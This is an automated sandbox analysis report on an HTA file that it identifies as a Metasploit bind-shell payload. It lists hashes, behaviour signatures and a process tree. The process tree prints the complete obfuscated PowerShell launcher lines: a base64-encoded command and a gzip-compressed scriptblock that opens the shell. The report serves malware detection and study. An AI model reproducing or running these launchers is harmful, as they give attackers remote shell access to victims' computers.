Analysis
-
max time kernel
119s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
30-05-2024 04:34
Static task
static1
Behavioral task
behavioral1
Sample
bind_tcp_uuid.hta
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
bind_tcp_uuid.hta
Resource
win10v2004-20240426-en
General
-
Target
bind_tcp_uuid.hta
-
Size
7KB
-
MD5
bce1078c57268ef42732dc651d2049c9
-
SHA1
e3df7d0b57e1a98c7614765abb51cf80f8b0c703
-
SHA256
14cff907c52f3c8efc51e1775fca708be95910b3488107d5be4e0b2cd5bcaaa3
-
SHA512
2c2d3569955489efe9c0c2b1f421bfab215bb0a36cb53002328bb4c2437f9731b853fa2db4ee74b98c6e7140c5ecac7f4e1bad86ba5af448f2c9b7f7cc657250
-
SSDEEP
192:Un2jh1hqT2Rxq0rNMP/9urq9oUSx8F6Nh3p3k2Zp2dHhxd:Un2jh1hscQ0rg0G9oUSU6NzDQdHhxd
Malware Config
Extracted
metasploit
windows/shell_bind_tcp
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 1756 powershell.exe 2672 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 1756 powershell.exe 2672 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1756 powershell.exe Token: SeDebugPrivilege 2672 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
mshta.exepowershell.exedescription pid process target process PID 2696 wrote to memory of 1756 2696 mshta.exe powershell.exe PID 2696 wrote to memory of 1756 2696 mshta.exe powershell.exe PID 2696 wrote to memory of 1756 2696 mshta.exe powershell.exe PID 2696 wrote to memory of 1756 2696 mshta.exe powershell.exe PID 1756 wrote to memory of 2672 1756 powershell.exe powershell.exe PID 1756 wrote to memory of 2672 1756 powershell.exe powershell.exe PID 1756 wrote to memory of 2672 1756 powershell.exe powershell.exe PID 1756 wrote to memory of 2672 1756 powershell.exe powershell.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bind_tcp_uuid.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARgBrADMAMQAyAFUAQwBBADcAVgBXAGEAMgAvAGEAUwBCAHsAMAB9ADkAWABxAG4ALwB3AGEAcQBRACcAJwArACcAJwBiAEsAcwBFADgAMgByAGEAUgBLAHEAMABOAG8AYQBZAGwARgBkAGkAcwBIAGsAVQByAFEAWgA3AE0AQgBQAEcASABtAEsAUABBADIAeQAzAC8AMwAzAHYAZwBKADMAUQBiAGIASwBiAFgAYQBrAGoASQBjAFkAegA5AHoAVgBuAHoAcgAxADMAbABtAG4AawBjAGMASQBpAEsAWgB4AEsAMwA5AHsAMQB9ACsAawBiAEkAeABRAEQARQBLAEoAYQBVAFEAawBhAEEAbwBGAHsAMAB9AHkATABmAFcAaQBxAHsAMAB9ADcAcwBGAGgAcQBlAEwAawBmAFIAWgBVAG0AYgB7ADEAfQBaAG0ATwB5AEUASgBGAG8AZgBuAG4AWgBTAE8ATQBZAFIALwB6ADQAWABiAHIAQwBYAEUAOABTAEgAQwA0AG8AdwBZAG0AaQBTAG4AOQBLADcAZwByAEgAKwBLAHkALwB1AE0ATQBlAGwANwA1AEoAaABkADkATABWADUAUQB0AEUATQAzAEUAOQBnADMAawByAGIAQgAwAHAAawBlACsAMgBPAHMAdwBEADQAbgBJAFMAdgBhAEcARQBxADcASQBYADcALwBLAHsAMQB9AHUAeQBzAE0AaQA4ADEANwAxAE4ARQBFADAAVwAyADkAdwBuAEgAWQBjAG0AbgBWAEYAYQBsADcAewAxAH0AcAB3AE8ATgB4AHYAcwBDAEoAMwBpAFIAZQB6AGgAQwAxADUAeQBTAFYAUgByAFYAbwBhAFIAUQBsAGEANABoADUAWQBlADgAQgBkAHoARgBmAE0AewAwAH0AMgBRADQAegBkAE4ANQBZAHMAegB7ADAAfQBPAE0AcQBPACcAJwArACcAJwBKAGUAdwBjAHAAUgBRAFoAcABvAE8AWQBlAGIAcgB2AHgAegBoAEoANQBLAEkAMABFAHgANQBtADgALwBsAHYAeQBpAHgAegBmADUAdABHAG4ASQBTADQAMQBJADQANABqAHQAbgBHAHgAdgBFACcAJwArACcAJwBEADgAWABCAFMAcwBsAEQAawBVADMAeQBMAGwAMwBQAFEAcwBuAGwATQBvAG0AQwB1AHEAaQBEADIAdwBOAFkAWQBnAEUAMABwAEwAVQByAC8AeABZAHoAUwB3ADkAcwBjAHYATgBjAHEASwBhAGQASwBJAEQAWABnAHMAVgBxAEUAYQAzADMAdQBvAEYAMwBtAHAAeABRAGYAVgBlAFYAbgBJAGgAVgBjAFUARwBFADgAOABnAEUAZwAvAEMANQBRAFgATwBZAFUAOABuAEQANwBHAFEANAA5AEwAZQBSAGoAZAB0AGoAQgBFAEwATQB5AFkAQQBrADUAewAxAH0ASAB7ADEAfQBXAHkAawBXAHAAQwA4ADQAUgBaAC8ARQBlAFAAZwB2AEQATwBNAFgAcQAvAEIARgB4AHEAYgBCAHYARgAxADkAcgBxADUASQByAGcAdABwAEQAOQBlAGIAVwBoAGIAVwBaAHcANABnAC8AZgA3AEwAdwBBAHcATQBLAGkAMAArACcAJwArACcAJwA0AEoANABSAGUANQByAE8ASgBsAHkAewAwAH0AQwA1AGoANQBDAEkAZgBGAHkAeQBpAHIAUAAzAFEAJwAnACsAJwAnAHAAZQBVAG4AeABBAHAASgBTAEwAOQBTAEIARQBSAGMANAAyAHMARwA5AGkAaQBnAFAARQBCAGMAeQBDAEgARAArAHAATgBVAFAAQwBIADMAVwBOAGwARgBBAGYAeAA3AG8ASABOADUAdABBAFYASABEAHAAewAxAH0AbwAvAEIASABHADkATwBrAGQAdABSAEYANABlAEEAMwB2AEUAYgAyAEYAcABZAFEAcQBMAGcAWABEAHAATABqAG4AMwB1AFgAWAB5AEQAawBOAHkAZwBLAEUAbQBLADAAaQBDAEYAewAwAH0AUABXAEsAawBvADAAUgB4AFgANQBSADAAcQBPAEUAWgBGAHQAewAxAH0AeQB0AGwAaABLAGoAKwBGADIAMAAwAHAASgB4ADUASwBlAEcANQB1AHIAdgA0AE4AegBzAHgAdABnADAAVQBKAGoAMQBNAFAANwBoAFUAZwBHAE4AbwBiADcAQgBGAEUAQgBTAEoARgB5AFMASQArAE4AdgBhADIASwBEAEoASAA5AC8ASwB6AGUARABRAFEAcABaAEEALwBZAE8AawBCADcAZwBOAFcAQgBBADQAMgBGACcAJwArACcAJwAyAHkAJwAnACsAJwAnAEoASQBWAEoAZwBoAGwAcQB5AE0AVwArAEgARwA0AHAARABrAEQAagBVAGoAJwAnACsAJwAnAFIAWgBGAEEAVgBTAEoATABFAGMATwA1AEUASQBCADkAdQBVAFgAdwBzAHcAegAnACcAKwAnACcANABVAGgANwBnAFUAcwBPAHkARQBtAFEAYwBOAGsAMgBaAGIAdwBvAE8AUwB7ADAAfQBtAFUASQBVAEUAeABnAGQAKwAvAFkAOABnAGYAaQA0AC8AaAAyAGcAYQBNAGMANwB1AFIAcwBrAHsAMAB9AGIARwBiAHMAdQBVAGkAQgBnAGoAOQBvAEMAWQA1AG0AQQBCACcAJwArACcAJwAzAGcAaQBEAGwAQQAwAFkAcABaAGEASwBBAEUAbgA5AGUAUABoAFUAWgA1AHAALwBYAEoAUQBJAGMAeABNAFMAMgBiAFkARwBkAE4ASwB1ADAAdAAvAEwAcgB3AEcANQBrAGYALwBTAC8AWABqAE8AKwAvAG0ASgBiAFcAOQBSAHIASgA0AEsAcgAxAFMAUwBmAGIAWQBPAHQAOQB7ADEAfQB1AG0AZQBmACsAMwBqAEMAOQB1AHAAYwA3AHYAWgA1AG8AMgBCAGIAdAAyAFEAcwBsAEYAZgBlAFUAWgA1AEsATwBhAFYASQBDAEQAbABZAEQATABTAHIAZQBIAEsAbwArAFYAQgBNACsAegAwADIAcwBsAE8AMgAxAHAAdQAxAHoATwBOAFAANwBiAFYAQgBKAGgAYQByADEAdgBqAHMAbAB7ADEAfQByADEAZgB1ADEAOABoAHIAUQBtADQARABlAFcAdgBkADcASQAnACcAKwAnACcAZABuAHUATwBqAEMASABpAHQAcgB2AEcATwAzAEUASwBMAGQAcAA4ADcAcAB4AHUAMwBDAHIAcgBhAGwATABMAGEAMwBlAFcAaQAxAGQAbAB0AGoAbgBFADEAUAB7ADAAfQB0AEEAcwBmAG0AZAAyADkAcgBoAHYATQByADMAWAAzADQAOABvAHQARwAxAHAAZQBhAEcAaQBhAGsAMQA3AHIAQgBoAHgAdgBzADIAdgBkADMAcQBCAEcAcQBLAE8AdABxAFYAVgBjADEAbgBFAGQAawAyAGcAdQBNADEAQgB3AHoAYwA0AEQAYgBWAGsAZgBhAEEAewAxAH0AdAAnACcAKwAnACcAQgBnADMAOQBlAG0AYwBRAFAATAAxAHYAdABxAFoAagAxAE8AMABzAGUAdABXAGwAVgBwAG0ATQBkAGIAUAB1AGYAQgBBADQATwBWAFYAUwBPAHgALwBlAGcAVQB0AG4AagBLAHgAaAAwAG4AOQB2AGEAUgBVAEgAdwA5AHgASgBoAHsAMQB9ADQAbABiAE8AdABvAFoAYgBLAG0ARQBHADUAYgBjAEcAeAA3AGEAewAxAH0AUQBYAHEAWABXAHoAOQBjAHoAeAAzAGUASQBMAGQAWQB7ADAAfQBkAHUATgAvAFMAagByAEwAQgByAGUAdQBBADMAewAxACcAJwArACcAJwB9AHEAMwBXAG0AbwBYAHIAdgBsAGUATgA5ADUAMwBKAGsAawBWAHIAUQAxADIAaQBMAHcAMQB2AGQAZQB2AFYAcABOAE4AYQAwAEIAaABmAHoAaQBxAE0AdAAyAGgAdgB7ADAAfQBIAFMATwA5AE8AOQBzAEQARQBaADEASABXAHIAYgB1AGwAZQBkADcATwBMAHgAcAB2AHQAeAA0AGMAdABSADkAYwB1AEMAbwB5AGgAZABqAEgAewAxAH0ALwBBAHsAMQB9ADQAJwAnACsAJwAnAE0AUgB1AFIAaQBOAGUAcQA4ADAASwA0AEYAdQBYAHoANwBaAHYAQwB3ADUAMgArAHsAMAB9AFUANABZADgAbABKAC8AewAxAH0ASwBJADQAVwBTAEUASwB6AEkARwAnACcAKwAnACcAewAxAH0AbgArAGQAdgBpADgAVwB0AHIASgBJAFAARwBCAEUAYQBpAGcASwBQAGcAagBXAE8ASQAwAHkAaABpADAASwBmAHoAVwBtAHYAVQA4AG8AOAAwAFUAaABFAHgAWQBjAGUAZAB1AHcAcwBvAHQARwBOADIAbwBlAFEAbgBwAHUAcAAwAHEATwAnACcAKwAnACcAZwArAHQAUgBlADgAcQBYAEwAeQB5AG0ARQBDAEcAawBFAEgAQwAnACcAKwAnACcAOQAxAGMAQgB7ADAAfQB3AFYAJwAnACsAJwAnAGIARwA4AHEANQBYAEwAMABCAGIASwB1ADMATAA5AGsARABDAHYAUAAxAGUARABiAGYAYQBLAHMARgBVAFUAZgBlAFUASQB7ADAAfQBHAGEAYwBIAG8AeQBEAFAAYgBLAFUAJwAnACsAJwAnAEYATwBWAFgAUQB3AFgAUABCAHcANQBWADcARQBXACcAJwArACcAJwB3AFgAcwBJAE4ASABLACsAaAB7ADEAfQBrAEEAUgBQAEoAWQBDAGcAWgA3AEIARwBEADMARgBMAGoALwBXAEkAeABGAE8AcwBBAFAAUQBLAG4ARAB5AG0AWABnADUAQQBFAEYAQQAvAHcAegBmAFMAdwBVAHUAbQB1AHAAcABrAHkANQA0AHcAYQA4AGsAewAwAH0ARgBiAE4AVgB2AEQAbgAvAHcAdABoAG4AdABiACsAWQBmAGQAVgBKAEMAbwBYAE0AMgBSACsAVwB2ADkAeAA0AGEAUQB7ADAAfQAvAEQASQBBAFgARQBRADQAeQBOAGwAUQBsAFMAawArAHYAaABPAGUAeABTAEgATABrAFoAUABMADkAUQBKAEkAZwBHAFUAMgB4AFAATwA1AG4ALwBLAHoASABqAHoARwBEAGwAMwBoAEwALwArAHEAZABKAEsANABDAHcAQQBBACcAJwApAC0AZgAnACcAVAAnACcALAAnACcANgAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAFk312UCA7VWa2/aSB{0}9Xqn/waqQ'+'bKsE82raRKq0NoaYlFdisHkUrQZ7MBPGHmKPA2y3/33vgJ3QbbKbXakjIcYz9zVnzr13lmnkccIiKZxK39{1}+kbIxQDEKJaUQkaAoF{0}yLfWiq{0}7sFhqeLkfRZUmb{1}ZmOyEJFofnnZSOMYR/z4XbrCXE8SHC4owYmiSn9K7grH+Ky/uMMel75Jhd9LV5QtEM3E9g3krbB0pke+2OswD4nISvaGEq7IX7/K{1}uysMi8171NEE0W29wnHYcmnVFal7{1}pwONxvsCJ3iRezhC15ySVRrVoaRQla4h5Ye8BdzFfM{0}2Q4zdN5Ysz{0}OMqO'+'JewcpRQZpoOYebrvxzhJ5KI0Ex5m8/lvyixzf5tGnIS41I44jtnGxvE'+'D8XBSslDkU3yLl3PQsnlMomCuqiD2wNYYgE0pLUr/xYzSw9scvNcqKadKIDXgsVqEa33uoF3mpxQfVeVnIhVcUGE88gEg/C5QXOYU8nD7GQ49LeRjdtjBELMyYAk5{1}H{1}WykWpC84RZ/EePgvDOMXq/BFxqbBvF19rq5IrgtpD9ebWhbWZw4g/f7LwAwMKi0+'+'4J4Re5rOJly{0}C5j5CIfFyyirP3Q'+'peUnxApJSL9SBERc42sG9iigPEBcyCHD+pNUPCH3WNlFAfx7oHN5tAVHDp{1}o/BHG9OkdtRF4eA3vEb2FpYQqLgXDpLjn3uXXyDkNygKEmK0iCF{0}PWKko0RxX5R0qOEZFt{1}ytlhKj+F200pJx5KeG5urv4Nzsxtg0UJj1MP7hUgGNob7BFEBSJFySI+Nva2KDJH9/KzeDQQpZA/YOkB7gNWBA42F'+'2y'+'JIVJghlqyMW+HG4pDkDjUj'+'RZFAVSJLEcO5EIB9uUXwswz'+'4Uh7gUsOyEmQcNk2ZbwoOS{0}mUIUExgd+/Y8gfi4/h2gaMc7uRsk{0}bGbsuUiBgj9oCY5mAB'+'3giDlA0YpZaKAEn9ePhUZ5p/XJQIcxMS2bYGdNKu0t/LrwG5kf/S/XjO+/mJbW9RrJ4Kr1SSfbYOt9{1}umef+3jC9upc7vZ5o2Bbt2QslFfeUZ5KOaVICDlYDLSreHKo+VBM+z02slO21pu1zONP7bVBJhar1vjsl{1}r1fu18hrQm4DeWvd7I'+'dnuOjCHitrvGO3EKLdp87pxu3CrralLLa3eWi1dltjnE1P{0}tAsfmd29rhvMr3X348otG1peaGiak17rBhxvs2vd3qBGqKOtqVVc1nEdk2guM1Bwzc4DbVkfaA{1}t'+'Bg39emcQPL1vtqZj1O0setWlVpmMdbPufBA4OVVSOx/egUtnjKxh0n9vaRUHw9xJh{1}4lbOtoZbKmEG5bcGx7a{1}QXqXWz9czx3eILdY{0}duN/SjrLBreuA3{1'+'}q3WmoXrvleN953JkkVrQ12iLw1vdevVpNNa0BhfziqMt2hv{0}HSO9O9sDEZ1HWrbuled7OLxpvtx4ctR9cuCoyhdjH{1}/A{1}4'+'MRuRiNeq80K4FuXz7ZvCw52+{0}U4Y8lJ/{1}KI4WSEKzIG'+'{1}n+dvi8WtrJIPGBEaigKPgjWOI0yhi0KfzWmvU8o80UhExYceduwsotGN2oeQnpup0qO'+'g+tRe8qXLyymECGkEHC'+'91cB{0}wV'+'bG8q5XL0BbKu3L9kDCvP1eDbfaKsFUUfeUI{0}GacHoyDPbKU'+'FOVXQwXPBw5V7EW'+'wXsINHK+h{1}kARPJYCgZ7BGD3FLj/WIxFOsAPQKnDymXg5AEFA/wzfSwUumuppky54wa8k{0}FbNVvDn/wthntb+YfdVJCoXM2R+Wv9x4aQ{0}/DIAXEQ4yNlQlSk+vhOexSHLkZPL9QJIgGU2xPO5n/KzHjzGDl3hL/+qdJK4CwAA')-f'T','6')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2672
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD506c06a762206845142df5a681c57195b
SHA1ee1f0e2311631c292153b8cb41d5018834614bfd
SHA2562474216f68c96a150ca1485f1cce6dd9ecefb98a7706260b5663853f1ae383c8
SHA512c22ec39fed247c1305f2f2bff509592d87c04e3ff5c5d17986239189d90c2dfebd54b2ccda7a73275b7bc182ae687f839847f09c6bd9b368cd020a4e6e9c358e
-
memory/2672-7-0x00000000048F0000-0x00000000048F1000-memory.dmpFilesize
4KB